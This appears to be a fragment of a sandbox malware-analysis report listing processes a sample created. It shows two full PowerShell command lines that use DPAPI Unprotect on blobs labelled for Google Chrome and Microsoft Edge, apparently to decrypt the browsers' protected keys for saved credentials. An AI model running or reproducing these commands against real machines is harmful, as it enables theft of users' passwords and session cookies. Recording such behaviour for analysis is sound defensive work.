Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'currentuser') |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'currentuser') |
Jump to behavior |